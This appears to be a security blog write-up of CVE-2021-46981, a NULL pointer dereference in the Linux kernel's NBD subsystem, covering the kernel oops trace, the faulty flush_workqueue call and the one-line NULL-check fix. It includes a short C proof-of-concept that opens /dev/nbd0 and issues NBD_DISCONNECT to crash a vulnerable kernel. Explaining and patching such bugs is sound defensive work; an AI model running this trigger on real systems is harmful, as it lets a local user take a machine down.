The Linux kernel is the backbone of countless systems, and even minor bugs can lead to serious issues. One such resolved bug is CVE-2021-46981, which affected the NBD (Network Block Device) subsystem. In simple terms, the bug let an attacker, or an unlucky sequence of ordinary operations, trigger a NULL pointer dereference in the kernel, crashing the system (a kernel oops or panic).

This article unpacks what CVE-2021-46981 is, how it could be triggered, and how the Linux kernel was patched to fix it, with plain-language explanations throughout. If you tinker with kernel code or care about system stability, this deep-dive is for you.

The Vulnerability in Brief

What is NBD?
The Network Block Device (NBD) is a Linux feature that allows you to access block devices (drives, partitions, images) over the network as if they were local. This is really useful, but like all code, it needs to be robust, especially if accessible by untrusted users.

What was wrong?
There was a logic bug where opening /dev/nbdX and then quickly disconnecting it could cause a part of the code to reference a NULL pointer. In kernel-space, this means a total system crash. Specifically, the issue lay in how the NBD code handled its internal recv_workq workqueue pointer.

If you:

1. Open /dev/nbdX (where X is any available NBD device), and

2. Immediately disconnect it (for example, through nbd-client -d or an ioctl call),

...then, due to a missing NULL check, the kernel might access nbd->recv_workq which hasn't yet been set up. This results in a NULL pointer dereference, causing a kernel oops and panic. Here is a real-life kernel message:

BUG: kernel NULL pointer dereference, address: 0000000000000020
#PF: supervisor write access in kernel mode
...
RIP: 0010:mutex_lock+0x29/0x60
Call Trace:
 flush_workqueue+0x92/0x6c0
 nbd_disconnect_and_put+0x81/0xd0
 nbd_genl_disconnect+0x125/0x2a0
 ...

The Broken Logic

The NBD device uses a counter called config_refs to check if its configuration is in use. But due to the timing of events, it was possible to have config_refs == 1 while nbd->recv_workq was still NULL. When disconnecting, code like this would attempt to access it blindly:

flush_workqueue(nbd->recv_workq); // <- this could be NULL!

If nbd->recv_workq is NULL, the kernel triggers an oops and crashes.

Who Can Exploit It?

- Local users: Anyone with access to open and interact with /dev/nbdX, including low-privilege accounts, could reliably cause a kernel panic (denial of service).

Exploit Scenario (C Code Example)

Here's how someone might trigger this on a vulnerable kernel (as non-root, if permissions on /dev/nbdX allow):

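#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <linux/nbd.h>

int main(void) {
    /* nbd0 stands in for /dev/nbdX; pick any available NBD device. */
    int fd = open("/dev/nbd0", O_RDWR);
    if (fd < 0) {
        perror("open");
        return 1;
    }
    /* Without any prior setup, request a disconnect right away.
     * Note: the call trace above enters through the generic netlink
     * handler nbd_genl_disconnect, so this ioctl variant may not
     * reach exactly the same code path. */
    if (ioctl(fd, NBD_DISCONNECT) < 0) {
        perror("ioctl NBD_DISCONNECT");
    }
    close(fd);
    return 0;
}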

This simple code may cause your entire system to crash!
*Do not run on production or important systems!*

How the Linux Kernel Fixed It

The fix was straightforward: Add a NULL check before using flush_workqueue().

Developers added this guard to nbd_disconnect_and_put():

if (nbd->recv_workq)
    flush_workqueue(nbd->recv_workq);

This makes sure there’s a valid work queue to flush before trying to use it. If it’s not set up yet (still NULL), it safely skips the step and avoids the crash.

Original Patch Commit:
- kernel.org patch
- Out-of-tree discussion

Before

flush_workqueue(nbd->recv_workq);

After

if (nbd->recv_workq)
    flush_workqueue(nbd->recv_workq);

Timeline

- Vulnerability discovered/fixed: January 2021 (reference)

References & Further Reading

- Kernel Patch on kernel.org
- Exploit discussion on oss-security mailing list
- CVE entry on Mitre

Conclusion

CVE-2021-46981 is a classic example of how seemingly simple logic bugs in the kernel can have severe reliability and security consequences. This bug allowed any authorized user to take down a Linux system by triggering a NULL pointer dereference in the NBD subsystem.

The fix was simple: just check the pointer before using it. But uncovering that fix, and understanding why that check matters, tells us a lot about robust kernel design.

If you are running Linux systems with NBD, make sure you’re updated!
And if you hack on kernel code, always check your pointers.



---
Author: Security Deep-Dives

Timeline

Published on: 02/28/2024 09:15:37 UTC
Last modified on: 12/06/2024 15:59:55 UTC